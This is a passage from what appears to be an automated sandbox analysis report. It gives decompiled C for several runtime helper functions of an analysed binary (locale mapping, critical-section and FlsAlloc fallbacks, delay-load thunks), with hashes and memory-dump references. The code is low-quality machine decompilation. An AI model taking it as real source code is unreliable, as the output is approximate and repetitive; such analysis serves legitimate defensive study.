                                                                                                                • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00EE00E9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Info
                                                                                                                • String ID:
                                                                                                                • API String ID: 1807457897-3916222277
                                                                                                                • Opcode ID: 9b8691505d637e7baece213df77a2a25e95692f6ce639237b1d64349d3e09fb8
                                                                                                                • Instruction ID: 930a1a9d6cf71fa9f934455f45ad2b2a2bc8c266217386ddee916cb99b824afc
                                                                                                                • Opcode Fuzzy Hash: 9b8691505d637e7baece213df77a2a25e95692f6ce639237b1d64349d3e09fb8
                                                                                                                • Instruction Fuzzy Hash: E54119705053CC9EDF228B658C84AFABBE9DB45308F1414EDE5CAAA142D275AAC5DF20
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EDF7FC, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 30%
                                                                                                                			E00EDF7FC(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4, int _a8, short* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _t18;
				intOrPtr* _t20;
				intOrPtr* _t31;
				signed int _t33;

				_t26 = __ecx;
				_push(__ecx);
				_t18 =  *0xef1558; // 0xf529bb33
				_v8 = _t18 ^ _t33;
				_push(__esi);
				_t20 = E00EDF528(0x16, "LCMapStringEx", 0xeeb0c4, "LCMapStringEx"); // executed
				_t31 = _t20;
				if(_t31 == 0) {
					LCMapStringW(E00EDF884(_t26, _t31, __eflags, _a4, 0), _a8, _a12, _a16, _a20, _a24);
				} else {
					 *0xee7220(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
					 *_t31();
				}
				return E00ED3C6A(_v8 ^ _t33);
			}








                                                                                                                0x00edf7fc
                                                                                                                0x00edf801
                                                                                                                0x00edf802
                                                                                                                0x00edf809
                                                                                                                0x00edf80c
                                                                                                                0x00edf81e
                                                                                                                0x00edf823
                                                                                                                0x00edf82a
                                                                                                                0x00edf86d
                                                                                                                0x00edf82c
                                                                                                                0x00edf849
                                                                                                                0x00edf84f
                                                                                                                0x00edf84f
                                                                                                                0x00edf881

                                                                                                                APIs
                                                                                                                • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,BAE85006,00000001,?,000000FF), ref: 00EDF86D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: String
                                                                                                                • String ID: LCMapStringEx
                                                                                                                • API String ID: 2568140703-3893581201
                                                                                                                • Opcode ID: 9ca0abdb73cdef5169eb821b14629c3c7b2931867a7645610c95196f2cea5b29
                                                                                                                • Instruction ID: b85abf38e3d849d84428aa44340053dddf134b0621b07f9f494eee42e9e38fbe
                                                                                                                • Opcode Fuzzy Hash: 9ca0abdb73cdef5169eb821b14629c3c7b2931867a7645610c95196f2cea5b29
                                                                                                                • Instruction Fuzzy Hash: 9A01C23650024DFBCF169F91EC02DAF7FA2EF48764F045165FA153A260C7329962AB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EDF79A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 21%
                                                                                                                			E00EDF79A(void* __ecx, void* __esi, void* __eflags, struct _CRITICAL_SECTION* _a4, long _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _t8;
				intOrPtr* _t10;
				intOrPtr* _t20;
				signed int _t22;

				_push(__ecx);
				_t8 =  *0xef1558; // 0xf529bb33
				_v8 = _t8 ^ _t22;
				_t10 = E00EDF528(0x14, "InitializeCriticalSectionEx", 0xeeb0bc, 0xeeb0c4); // executed
				_t20 = _t10;
				if(_t20 == 0) {
					InitializeCriticalSectionAndSpinCount(_a4, _a8);
				} else {
					 *0xee7220(_a4, _a8, _a12);
					 *_t20();
				}
				return E00ED3C6A(_v8 ^ _t22);
			}








                                                                                                                0x00edf79f
                                                                                                                0x00edf7a0
                                                                                                                0x00edf7a7
                                                                                                                0x00edf7bc
                                                                                                                0x00edf7c1
                                                                                                                0x00edf7c8
                                                                                                                0x00edf7e5
                                                                                                                0x00edf7ca
                                                                                                                0x00edf7d5
                                                                                                                0x00edf7db
                                                                                                                0x00edf7db
                                                                                                                0x00edf7f9

                                                                                                                APIs
                                                                                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00EDED9F), ref: 00EDF7E5
                                                                                                                Strings
                                                                                                                • InitializeCriticalSectionEx, xrefs: 00EDF7B5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CountCriticalInitializeSectionSpin
                                                                                                                • String ID: InitializeCriticalSectionEx
                                                                                                                • API String ID: 2593887523-3084827643
                                                                                                                • Opcode ID: 8d29da50f4e750463806df50732f5808cf2afc3405214d8bab7aa08f12df47a0
                                                                                                                • Instruction ID: 18e6307efd5c551b30d363de10eab8a78997fdbf9d90e29c8f868c9613260cc0
                                                                                                                • Opcode Fuzzy Hash: 8d29da50f4e750463806df50732f5808cf2afc3405214d8bab7aa08f12df47a0
                                                                                                                • Instruction Fuzzy Hash: 4EF0B43160024CFBCB11AF56EC41CAF7FA1EF48720B005166FD193A360DB318D129B90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EDF63F, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 16%
                                                                                                                			E00EDF63F(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _t4;
				intOrPtr* _t6;
				intOrPtr* _t16;
				signed int _t18;

				_push(__ecx);
				_t4 =  *0xef1558; // 0xf529bb33
				_v8 = _t4 ^ _t18;
				_t6 = E00EDF528(3, "FlsAlloc", 0xeeb080, 0xeeb088); // executed
				_t16 = _t6;
				if(_t16 == 0) {
					TlsAlloc();
				} else {
					 *0xee7220(_a4);
					 *_t16();
				}
				return E00ED3C6A(_v8 ^ _t18);
			}








                                                                                                                0x00edf644
                                                                                                                0x00edf645
                                                                                                                0x00edf64c
                                                                                                                0x00edf661
                                                                                                                0x00edf666
                                                                                                                0x00edf66d
                                                                                                                0x00edf67e
                                                                                                                0x00edf66f
                                                                                                                0x00edf674
                                                                                                                0x00edf67a
                                                                                                                0x00edf67a
                                                                                                                0x00edf692

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Alloc
                                                                                                                • String ID: FlsAlloc
                                                                                                                • API String ID: 2773662609-671089009
                                                                                                                • Opcode ID: 6014ab2fc99e9685d9057b9ebae0577936ce2aaaab68c3fe07cc6d48242518aa
                                                                                                                • Instruction ID: 3f0be82cda77cedbb3ca1957d5c6a9afc9e644ee589a0412b414ff4cc0eb1067
                                                                                                                • Opcode Fuzzy Hash: 6014ab2fc99e9685d9057b9ebae0577936ce2aaaab68c3fe07cc6d48242518aa
                                                                                                                • Instruction Fuzzy Hash: BBE02B71A4535CABC311EFB7AC02A6FBB94DB58B11B01116AFC067B3A0DE709F0686D5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED8216, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 68%
                                                                                                                			E00ED8216(void* __eflags, intOrPtr _a4) {
				intOrPtr* _t2;
				intOrPtr* _t6;

				_t2 = E00ED80F5(4, "FlsAlloc", 0xee93d8, "FlsAlloc"); // executed
				_t6 = _t2;
				if(_t6 == 0) {
					return TlsAlloc();
				}
				L00ED4019();
				return  *_t6(_a4);
			}





                                                                                                                0x00ed822b
                                                                                                                0x00ed8230
                                                                                                                0x00ed8237
                                                                                                                0x00ed824a
                                                                                                                0x00ed824a
                                                                                                                0x00ed823e
                                                                                                                0x00ed8247

                                                                                                                APIs
                                                                                                                • try_get_function.LIBVCRUNTIME ref: 00ED822B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: try_get_function
                                                                                                                • String ID: FlsAlloc
                                                                                                                • API String ID: 2742660187-671089009
                                                                                                                • Opcode ID: 72b8eaad5cf47f091c82c92a71a851a1c4947e99fce4ccc32b6dd043221442be
                                                                                                                • Instruction ID: 2527dc285291109d1556c3b7e84551981b410488df31765a952567ddf84d823b
                                                                                                                • Opcode Fuzzy Hash: 72b8eaad5cf47f091c82c92a71a851a1c4947e99fce4ccc32b6dd043221442be
                                                                                                                • Instruction Fuzzy Hash: CFD05B717C976C67D51036E66C03AD976C4C711BF3F042062FB0C757C299A1581192D5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED29FB, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E00ED29FB() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00ED304E(_t3, _t4, _t8, _t9, _t10, 0xeef694, 0xf2613c); // executed
				goto __eax;
			}








                                                                                                                0x00ed2a05
                                                                                                                0x00ed2a0d
                                                                                                                0x00ed2a14

                                                                                                                APIs
                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00ED2A0D
                                                                                                                  • Part of subcall function 00ED304E: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ED30CB
                                                                                                                  • Part of subcall function 00ED304E: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ED30DC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                • String ID: Ht>*
                                                                                                                • API String ID: 1269201914-4271059343
                                                                                                                • Opcode ID: b24966e5b715c806971e4fe143dbf696b6fa9ce672812cdc0c7dc17baa5a380a
                                                                                                                • Instruction ID: c65b91277df433041d6505aaf440126760c629124615eefc5cd4503db5f1ba1f
                                                                                                                • Opcode Fuzzy Hash: b24966e5b715c806971e4fe143dbf696b6fa9ce672812cdc0c7dc17baa5a380a
                                                                                                                • Instruction Fuzzy Hash: B4B01295259182BD312451122E06C3A030CC3D0F10330E02FF501F8142B4841D521033
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED2AAC, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E00ED2AAC() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00ED304E(_t3, _t4, _t8, _t9, _t10, 0xeef694, 0xf260f8); // executed
				goto __eax;
			}








                                                                                                                0x00ed2a05
                                                                                                                0x00ed2a0d
                                                                                                                0x00ed2a14

                                                                                                                APIs
                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00ED2A0D
                                                                                                                  • Part of subcall function 00ED304E: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ED30CB
                                                                                                                  • Part of subcall function 00ED304E: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ED30DC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                • String ID: Ht>*
                                                                                                                • API String ID: 1269201914-4271059343
                                                                                                                • Opcode ID: 710c9cc7b16d05c3ce1a88c9b69bdea4978e71333d58fb282a1e33b40350cff2
                                                                                                                • Instruction ID: ee690de860e2f9923b94e1636ebd3f738961284f6de13a3ffa37946271526da0
                                                                                                                • Opcode Fuzzy Hash: 710c9cc7b16d05c3ce1a88c9b69bdea4978e71333d58fb282a1e33b40350cff2
                                                                                                                • Instruction Fuzzy Hash: A5B0129525C2826D322491162E02C7A035CD2D4F10330E13FF100E9241D8800D462033
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED2AA2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E00ED2AA2() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00ED304E(_t3, _t4, _t8, _t9, _t10, 0xeef694, 0xf260fc); // executed
				goto __eax;
			}








                                                                                                                0x00ed2a05
                                                                                                                0x00ed2a0d
                                                                                                                0x00ed2a14

                                                                                                                APIs
                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00ED2A0D
                                                                                                                  • Part of subcall function 00ED304E: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ED30CB
                                                                                                                  • Part of subcall function 00ED304E: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ED30DC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                • String ID: Ht>*
                                                                                                                • API String ID: 1269201914-4271059343
                                                                                                                • Opcode ID: bd39dbe4177db46285960e13ab9d8cbd978739e7e92611bd21aa5a7a2127382c
                                                                                                                • Instruction ID: 3c1801203540b1fb02453cc90aa88a5101961f01aedea4bcdb8bb37e3ba42e20
                                                                                                                • Opcode Fuzzy Hash: bd39dbe4177db46285960e13ab9d8cbd978739e7e92611bd21aa5a7a2127382c
                                                                                                                • Instruction Fuzzy Hash: 4EB0129525C182ED312491162E03C3B034CD3D4F10330E03FF500E9241D8800D022033
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED2A8E, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E00ED2A8E() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00ED304E(_t3, _t4, _t8, _t9, _t10, 0xeef694, 0xf26104); // executed
				goto __eax;
			}








                                                                                                                0x00ed2a05
                                                                                                                0x00ed2a0d
                                                                                                                0x00ed2a14

                                                                                                                APIs
                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00ED2A0D
                                                                                                                  • Part of subcall function 00ED304E: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ED30CB
                                                                                                                  • Part of subcall function 00ED304E: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ED30DC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                • String ID: Ht>*
                                                                                                                • API String ID: 1269201914-4271059343
                                                                                                                • Opcode ID: e7da27d6727e69ef06c93a4907daa47edb80f57c7caa305a1c4fc4b4a0531a8f
                                                                                                                • Instruction ID: 08a9a3814686146eb9a2230689f679739c1cd92f1347c00d8782d47ac948232d
                                                                                                                • Opcode Fuzzy Hash: e7da27d6727e69ef06c93a4907daa47edb80f57c7caa305a1c4fc4b4a0531a8f
                                                                                                                • Instruction Fuzzy Hash: C2B01295358182AD312452162F03C3A034CC3D4F10330E02FF500E9242D4801E031033
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED2A98, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E00ED2A98() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00ED304E(_t3, _t4, _t8, _t9, _t10, 0xeef694, 0xf26100); // executed
				goto __eax;
			}








                                                                                                                0x00ed2a05
                                                                                                                0x00ed2a0d
                                                                                                                0x00ed2a14

                                                                                                                APIs
                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00ED2A0D
                                                                                                                  • Part of subcall function 00ED304E: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ED30CB
                                                                                                                  • Part of subcall function 00ED304E: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ED30DC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                • String ID: Ht>*
                                                                                                                • API String ID: 1269201914-4271059343
                                                                                                                • Opcode ID: cd0e5cdedf78c7475223b1b51f4faa48fbeb956866b576e999c1ed96ced78e1f
                                                                                                                • Instruction ID: f806b5d4b199ec5f86cfb9352acdcd72b4487fccbcd3d99dadd6f6be42b22859
                                                                                                                • Opcode Fuzzy Hash: cd0e5cdedf78c7475223b1b51f4faa48fbeb956866b576e999c1ed96ced78e1f
                                                                                                                • Instruction Fuzzy Hash: 97B012953581C26D312451162E02C3A034CD3D4F11330E02FF500E9242D4801D021033
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED2A66, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E00ED2A66() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00ED304E(_t3, _t4, _t8, _t9, _t10, 0xeef694, 0xf26114); // executed
				goto __eax;
			}








                                                                                                                0x00ed2a05
                                                                                                                0x00ed2a0d
                                                                                                                0x00ed2a14

                                                                                                                APIs
                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00ED2A0D
                                                                                                                  • Part of subcall function 00ED304E: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ED30CB
                                                                                                                  • Part of subcall function 00ED304E: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ED30DC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                • String ID: Ht>*
                                                                                                                • API String ID: 1269201914-4271059343
                                                                                                                • Opcode ID: f7b41defee753452121d1aae6e3270ddb3264c35b2837f283fab4a713373bac8
                                                                                                                • Instruction ID: 350e02e143ca60c5d40e81130f0cd36fbe8d81998d25cad586da6a4c49a35de8
                                                                                                                • Opcode Fuzzy Hash: f7b41defee753452121d1aae6e3270ddb3264c35b2837f283fab4a713373bac8
                                                                                                                • Instruction Fuzzy Hash: 34B012952581826D313452166F03D3A034CC3D4F10330E02FF100E9242D4801E031033
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED2A7A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E00ED2A7A() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00ED304E(_t3, _t4, _t8, _t9, _t10, 0xeef694, 0xf2610c); // executed
				goto __eax;
			}








                                                                                                                0x00ed2a05
                                                                                                                0x00ed2a0d
                                                                                                                0x00ed2a14

                                                                                                                APIs
                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00ED2A0D
                                                                                                                  • Part of subcall function 00ED304E: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ED30CB
                                                                                                                  • Part of subcall function 00ED304E: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ED30DC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
